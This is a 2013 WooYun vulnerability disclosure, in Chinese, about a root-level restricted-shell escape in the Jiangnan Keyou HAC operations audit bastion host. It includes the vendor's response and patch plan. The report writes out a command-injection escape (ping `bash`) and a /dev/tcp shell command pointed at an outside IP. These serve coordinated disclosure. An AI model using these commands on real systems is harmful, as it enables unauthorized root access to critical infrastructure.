漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-028617
漏洞标题:江南科友运维审计系统可Root
相关厂商:江南科友
漏洞作者: 小熊饼干
提交时间:2013-07-12 10:41
修复时间:2013-10-10 10:42
公开时间:2013-10-10 10:42
漏洞类型:权限控制绕过
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-12: 细节已通知厂商并且等待厂商处理中
2013-07-16: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向第三方安全合作伙伴开放
2013-09-09: 细节向核心白帽子及相关领域专家公开
2013-09-19: 细节向普通白帽子公开
2013-09-29: 细节向实习白帽子公开
2013-10-10: 细节向公众公开
简要描述:
江南科友hac运维审计系统是一款用于审计的堡垒主机系统,属于内网安全非常重要的系统,且其自称服务于银行、证券、电力、医疗等诸多行业,一些常见的银行,交通银行、民生银行等等等就采用其服务;但是这个设备存在严重漏洞,可直接获取root权限。。
详细说明:
江南科友hac运维审计系统,下称HAC。
有次正好有机会摸到了这个NB闪闪的东西,一时兴起,就测了下其SSH shell的安全性。
使用一个普通用户SSH登录HAC后,shell做了较严格限制,发现只能执行echo / ssh / ping 命令(具体忘掉是哪几个了,没注意...),无任何其他命令。
我勒个去,好nb的样子,貌似没啥漏洞。
就在要放弃的时候,输入了个
ping `bash`,突然就成功获得了一个bash,如下图:
貌似有戏了,不过执行了各种强大的命令,如ls,pwd,都不见有输出,也没有报错(如命令不存在,无权限执行),看起来很奇怪的样子...
直觉是命令可以执行,但是把命令的输出都给重定向了,真是坑爹...
不过没关系,我们有下面这个NB闪闪的命令
bash </dev/tcp/1.1.1.1/2222
竟然真的得到了一个shell,而且竟然直接就是root shell...太尼玛顺利了吧...
赶紧ps下看看:
顺便看了下之前一直读不到的/etc/passwd:
hacuser 的uid/gid竟然都是0...
结合图2 pts/1 对应的进程树,看来普通用户登录进来就是root权限,只不过可执行的没几个命令...
ps 了一下,看了都有啥进程,发现更亮的东西在下面,请保护好眼睛:
我沉思了好久,始终不知道如何才能把.exe文件弄到linux上运行...
好吧,就写到这吧,root都有了,该干啥干啥去了
漏洞证明:
略
修复方案:
NB厂商自己好好琢磨琢磨吧
版权声明:转载请注明来源 小熊饼干@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-07-16 22:57
厂商回复:
至16日,暂未能找到实例或本地案例进行复现(注:由于不具有该设备,CNVD已经在协调多方进行验证)。先行根据图片按通用软硬件漏洞进行确认,在未能及时复现的情况下,将转发给厂商,由其确认并处置。该系统多部署在内部网络,因此远程危害性稍微小一些。
rank 20
最新状态:
2013-07-24:转发江南科友厂商的回复意见:在对漏洞原理进行准确定位后,我司组织开发人员与安全工程师立即展开相关的修补加固工作,针对该漏洞,开发针对性的修补包,严格限制用户的输入输出,并在所有版本上进行测试,确保修补包的有效性、安全性、稳定性。修补包的工作将在本周内完成。我司后续工作计划如下:1、 向存在该漏洞的用户主动发送漏洞公告和提供升级补丁包,并协助用户完成该漏洞的修补工作;2、 启动对系统内嵌的开源软件及操作环境的全面渗透分析工作,并在安全设计、编码等各阶段,对存在的安全问题进行梳理,防范可能存在的安全风险;3、 充分利用第三方资源,引入外部可靠性测试与安全性检测,提升产品的质量。谨此,我司真诚对“小熊饼干”及www.wooyun.org致以谢意。